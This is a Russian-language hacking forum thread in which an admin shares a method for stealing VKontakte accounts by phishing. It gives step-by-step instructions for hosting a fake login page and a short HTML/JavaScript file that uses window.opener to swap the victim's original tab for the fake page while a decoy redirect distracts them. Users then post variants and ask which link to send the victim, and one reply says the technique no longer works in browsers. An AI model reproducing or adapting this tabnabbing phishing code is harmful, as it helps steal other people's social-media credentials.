Схема по которой работают "взломщики" ВК

[Admin]

Новое Тема слита, так что о 100% работе говорить не буду!
Не давно на форуме увидел пару человек , которые предоставляют услуги по взлому аккаунтов в социальной сети ВКонтакте.

Было решено провести тест , и не пожалев денег заказал услугу по взлому собственной страницы.

Человек добавил меня , и скинул ссылку якобы на мою фотографию (домен был не бесплатный) , я перешёл и увидел что родительская вкладка была заменена на фейковую , и после чего мне выдало окно авторизации ВКонтакте.

Здесь все становиться ясно , и ниже я если можно так сказать "солью" способ взлома.


1. Регистрируем любой хостинг аккаунт (можно и с бесплатным доменом).
2. Далее закидаем фейковую страницу в корень , и после чего создаем файл window.htm (можете использовать любое название).
3. Открываем наш только созданный файл через редактор , и пишем следующий код:

<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
  if(parent.window.opener) parent.window.opener.location.replace("http://site.in"); // Ссылка на фейк.
  document.location.href = "http://site.in"; // Ссылка для отводки глаз жертвы.
</script>
</body>
</html>

Готово ! По данному принципу работает множество "взломщиков". Пользуемся

 

[Little_Prince]

Если моя фейка страница размещена в корне моего сайта (localhost) ,т.е при открытии localhost открывает сразу нее,то код будет иметь подобный вид ?

<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
  if(parent.window.opener) parent.window.opener.location.replace("http://localhost/"); // Ссылка на фейк.
  document.location.href = "https://vk.com/feed"; // Ссылка для отводки глаз жертвы.
</script>
</body>
</html>

?
Что за "Ссылка для отводки глаз жертвы." ? Что то не могу разобраться,вроде сделал все как нужно,но результат получил не тот который "скорее всего" должен быть . Какой именно линк кидать жертве ? На этот файл "window.htm" ?

P.S #послеНовогоднийПротуп

 

[evgenii999]

Новое Тема слита, так что о 100% работе говорить не буду!
Не давно на форуме увидел пару человек , которые предоставляют услуги по взлому аккаунтов в социальной сети ВКонтакте.

Было решено провести тест , и не пожалев денег заказал услугу по взлому собственной страницы.

Человек добавил меня , и скинул ссылку якобы на мою фотографию (домен был не бесплатный) , я перешёл и увидел что родительская вкладка была заменена на фейковую , и после чего мне выдало окно авторизации ВКонтакте.

Здесь все становиться ясно , и ниже я если можно так сказать "солью" способ взлома.


1. Регистрируем любой хостинг аккаунт (можно и с бесплатным доменом).
2. Далее закидаем фейковую страницу в корень , и после чего создаем файл window.htm (можете использовать любое название).
3. Открываем наш только созданный файл через редактор , и пишем следующий код:

<html>
<head>
<title></title>
</head>
<body>
<script language="JavaScript">
  if(parent.window.opener) parent.window.opener.location.replace("http://site.in"); // Ссылка на фейк.
  document.location.href = "http://site.in"; // Ссылка для отводки глаз жертвы.
</script>
</body>
</html>

Готово ! По данному принципу работает множество "взломщиков". Пользуемся

Добрый вечер! У меня есть вопрос по данной теме. Смысл же в том, что ссылка "для отвода глаз" должна вести же на фейк как я понял, вы пробовали этот метод? а

 

[pw0ned]

Добрый вечер! У меня есть вопрос по данной теме. Смысл же в том, что ссылка "для отвода глаз" должна вести же на фейк как я понял, вы пробовали этот метод? а

window.opener не работает в браузерах, и уже давно.
Как вариант если на сайте присутствует target="_blank" vulnerability, тогда без проблем, но в ВК это пофикшено пару месяцев назад.

Если кому интересно, вот наглядный пример использования уязвимости в сервисе Web.Skype

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

 

[evgenii999]

спасибо, понял